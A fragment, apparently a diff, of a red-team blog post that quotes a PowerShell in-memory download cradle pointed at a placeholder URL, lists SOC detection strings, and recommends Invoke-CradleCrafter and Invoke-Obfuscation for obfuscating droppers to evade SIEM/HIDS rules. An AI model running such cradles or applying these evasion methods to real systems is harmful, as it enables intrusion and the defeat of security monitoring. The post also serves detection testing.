whmacmac/test/_posts/2020-04-22-RedTeam-Exercises-with-OpenSource-Tools-Part-2.md

 Possibly many of you use the powershell command "IEX((New-Object System.Net.WebClient).downloadstring('http://something'));" for downloading in memory your payload.
 I worked in a SOC and I know the strings like "new-object", "Webclient", "downloadstring" are used by many for detecting suspicious events.
 I will make use of an open source <a href="https://github.com/danielbohannon/Invoke-CradleCrafter" style="text-decoration: none;">tool</a> made special for this kind of tasks.<br/>
 Invoke-CradleCafter is a tool special created for automating the process for making obfuscated downloaders in memory or on disk.

-I am using the only in memory downloader.
+In my example I am using "MEMORY\PSCOMPILEDCSHARP\INVOKE\10".
 I invite you to take a look on it in case you are interested in using it.
 If you are a blue teamer, you may be interested in testing your detection capabilities of your SIEM/HIDS with Invoke-CradleCafter.
 <br/> I can also obfuscate more the dropper with Invoke-Obfuscation, for escaping the most exotic SIEM/HIDS rules but I am not doing it this time.

 <div>